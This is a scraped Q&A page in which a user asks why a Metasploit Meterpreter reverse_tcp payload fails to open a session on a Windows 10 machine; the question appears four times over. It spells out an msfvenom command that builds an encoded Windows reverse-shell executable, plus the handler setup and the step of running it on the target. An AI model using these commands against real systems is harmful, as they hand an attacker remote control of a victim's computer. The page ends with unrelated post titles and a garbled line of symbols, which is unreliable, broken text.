Meterpreter does not detect a reverse connection from the payload even after executing the payload on the...












-1















Steps to reproduce




  1. First i created a payload using
    msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=192.168.10.5(using ifconfig) -f exe -e x84/shikata_ga_nai -i 3 -b 'x00xff' >/root/desktop/ABC.exe
    !command executes properly and a payload is created

  2. then i copy the payload to target device (windows 10)

  3. i start the msfconsole
    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 192.168.10.5
    lhost => 192.168.0.5
    msf exploit(handler) > set lport 8080
    lport => 8080

  4. then i run the payload on the target device


Expected behavior



 Started reverse TCP handler on 192.168.10.5:8080
Starting the payload handler
/It should open a session/


Current behavior
msfconsole continues to wait for the reponse from the handler and just continues to blink the cursor.
I have tried multiple techniques but id does not work.I have executed the handler multiple times but still not works.I have tries the lport to be 4444 but did not work.
But when i listen using wireshark it gets some response when i execute the handler on target computer.



System stuff:
kali linux 4.9 or 2017.4.4

Metasploit version:
framework 4.14.10-dev


console same as above



kindly help because i am stuck at this since long.Thanks in advance



I am running Kali on Virtual Box and i am using a wifi adapter directly for kali (ALFA AWUS036NH).I am not using any bridged network or nat network.My target device is a PC WIndows-10 .Both the target and KAli are in same network.










share|improve this question





























    -1















    Steps to reproduce




    1. First i created a payload using
      msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=192.168.10.5(using ifconfig) -f exe -e x84/shikata_ga_nai -i 3 -b 'x00xff' >/root/desktop/ABC.exe
      !command executes properly and a payload is created

    2. then i copy the payload to target device (windows 10)

    3. i start the msfconsole
      msf > use exploit/multi/handler
      msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
      payload => windows/meterpreter/reverse_tcp
      msf exploit(handler) > set lhost 192.168.10.5
      lhost => 192.168.0.5
      msf exploit(handler) > set lport 8080
      lport => 8080

    4. then i run the payload on the target device


    Expected behavior



     Started reverse TCP handler on 192.168.10.5:8080
    Starting the payload handler
    /It should open a session/


    Current behavior
    msfconsole continues to wait for the reponse from the handler and just continues to blink the cursor.
    I have tried multiple techniques but id does not work.I have executed the handler multiple times but still not works.I have tries the lport to be 4444 but did not work.
    But when i listen using wireshark it gets some response when i execute the handler on target computer.



    System stuff:
    kali linux 4.9 or 2017.4.4

    Metasploit version:
    framework 4.14.10-dev


    console same as above



    kindly help because i am stuck at this since long.Thanks in advance



    I am running Kali on Virtual Box and i am using a wifi adapter directly for kali (ALFA AWUS036NH).I am not using any bridged network or nat network.My target device is a PC WIndows-10 .Both the target and KAli are in same network.










    share|improve this question



























      -1












      -1








      -1








      Steps to reproduce




      1. First i created a payload using
        msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=192.168.10.5(using ifconfig) -f exe -e x84/shikata_ga_nai -i 3 -b 'x00xff' >/root/desktop/ABC.exe
        !command executes properly and a payload is created

      2. then i copy the payload to target device (windows 10)

      3. i start the msfconsole
        msf > use exploit/multi/handler
        msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
        payload => windows/meterpreter/reverse_tcp
        msf exploit(handler) > set lhost 192.168.10.5
        lhost => 192.168.0.5
        msf exploit(handler) > set lport 8080
        lport => 8080

      4. then i run the payload on the target device


      Expected behavior



       Started reverse TCP handler on 192.168.10.5:8080
      Starting the payload handler
      /It should open a session/


      Current behavior
      msfconsole continues to wait for the reponse from the handler and just continues to blink the cursor.
      I have tried multiple techniques but id does not work.I have executed the handler multiple times but still not works.I have tries the lport to be 4444 but did not work.
      But when i listen using wireshark it gets some response when i execute the handler on target computer.



      System stuff:
      kali linux 4.9 or 2017.4.4

      Metasploit version:
      framework 4.14.10-dev


      console same as above



      kindly help because i am stuck at this since long.Thanks in advance



      I am running Kali on Virtual Box and i am using a wifi adapter directly for kali (ALFA AWUS036NH).I am not using any bridged network or nat network.My target device is a PC WIndows-10 .Both the target and KAli are in same network.










      share|improve this question
















      Steps to reproduce




      1. First i created a payload using
        msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=192.168.10.5(using ifconfig) -f exe -e x84/shikata_ga_nai -i 3 -b 'x00xff' >/root/desktop/ABC.exe
        !command executes properly and a payload is created

      2. then i copy the payload to target device (windows 10)

      3. i start the msfconsole
        msf > use exploit/multi/handler
        msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
        payload => windows/meterpreter/reverse_tcp
        msf exploit(handler) > set lhost 192.168.10.5
        lhost => 192.168.0.5
        msf exploit(handler) > set lport 8080
        lport => 8080

      4. then i run the payload on the target device


      Expected behavior



       Started reverse TCP handler on 192.168.10.5:8080
      Starting the payload handler
      /It should open a session/


      Current behavior
      msfconsole continues to wait for the reponse from the handler and just continues to blink the cursor.
      I have tried multiple techniques but id does not work.I have executed the handler multiple times but still not works.I have tries the lport to be 4444 but did not work.
      But when i listen using wireshark it gets some response when i execute the handler on target computer.



      System stuff:
      kali linux 4.9 or 2017.4.4

      Metasploit version:
      framework 4.14.10-dev


      console same as above



      kindly help because i am stuck at this since long.Thanks in advance



      I am running Kali on Virtual Box and i am using a wifi adapter directly for kali (ALFA AWUS036NH).I am not using any bridged network or nat network.My target device is a PC WIndows-10 .Both the target and KAli are in same network.







      metasploit exploit






      share|improve this question















      share|improve this question













      share|improve this question




      share|improve this question








      edited Jan 13 at 17:01









      Albin

      2,3211129




      2,3211129










      asked Jan 13 at 16:22









      samdsamd

      1




      1






















          0






          active

          oldest

          votes











          Your Answer








          StackExchange.ready(function() {
          var channelOptions = {
          tags: "".split(" "),
          id: "3"
          };
          initTagRenderer("".split(" "), "".split(" "), channelOptions);

          StackExchange.using("externalEditor", function() {
          // Have to fire editor after snippets, if snippets enabled
          if (StackExchange.settings.snippets.snippetsEnabled) {
          StackExchange.using("snippets", function() {
          createEditor();
          });
          }
          else {
          createEditor();
          }
          });

          function createEditor() {
          StackExchange.prepareEditor({
          heartbeatType: 'answer',
          autoActivateHeartbeat: false,
          convertImagesToLinks: true,
          noModals: true,
          showLowRepImageUploadWarning: true,
          reputationToPostImages: 10,
          bindNavPrevention: true,
          postfix: "",
          imageUploader: {
          brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
          contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
          allowUrls: true
          },
          onDemand: true,
          discardSelector: ".discard-answer"
          ,immediatelyShowMarkdownHelp:true
          });


          }
          });














          draft saved

          draft discarded


















          StackExchange.ready(
          function () {
          StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsuperuser.com%2fquestions%2f1393812%2fmeterpreter-does-not-detect-a-reverse-connection-from-the-payload-even-after-exe%23new-answer', 'question_page');
          }
          );

          Post as a guest















          Required, but never shown

























          0






          active

          oldest

          votes








          0






          active

          oldest

          votes









          active

          oldest

          votes






          active

          oldest

          votes
















          draft saved

          draft discarded




















































          Thanks for contributing an answer to Super User!


          • Please be sure to answer the question. Provide details and share your research!

          But avoid



          • Asking for help, clarification, or responding to other answers.

          • Making statements based on opinion; back them up with references or personal experience.


          To learn more, see our tips on writing great answers.




          draft saved


          draft discarded














          StackExchange.ready(
          function () {
          StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsuperuser.com%2fquestions%2f1393812%2fmeterpreter-does-not-detect-a-reverse-connection-from-the-payload-even-after-exe%23new-answer', 'question_page');
          }
          );

          Post as a guest















          Required, but never shown





















































          Required, but never shown














          Required, but never shown












          Required, but never shown







          Required, but never shown

































          Required, but never shown














          Required, but never shown












          Required, but never shown







          Required, but never shown







          Popular posts from this blog

          flock() on closed filehandle LOCK_FILE at /usr/bin/apt-mirror

          Mangá

           ⁒  ․,‪⁊‑⁙ ⁖, ⁇‒※‌, †,⁖‗‌⁝    ‾‸⁘,‖⁔⁣,⁂‾
”‑,‥–,‬ ,⁀‹⁋‴⁑ ‒ ,‴⁋”‼ ⁨,‷⁔„ ‰′,‐‚ ‥‡‎“‷⁃⁨⁅⁣,⁔
⁇‘⁔⁡⁏⁌⁡‿‶‏⁨ ⁣⁕⁖⁨⁩⁥‽⁀  ‴‬⁜‟ ⁃‣‧⁕‮ …‍⁨‴ ⁩,⁚⁖‫ ,‵ ⁀,‮⁝‣‣ ⁑  ⁂– ․, ‾‽ ‏⁁“⁗‸ ‾… ‹‡⁌⁎‸‘ ‡⁏⁌‪ ‵⁛ ‎⁨ ―⁦⁤⁄⁕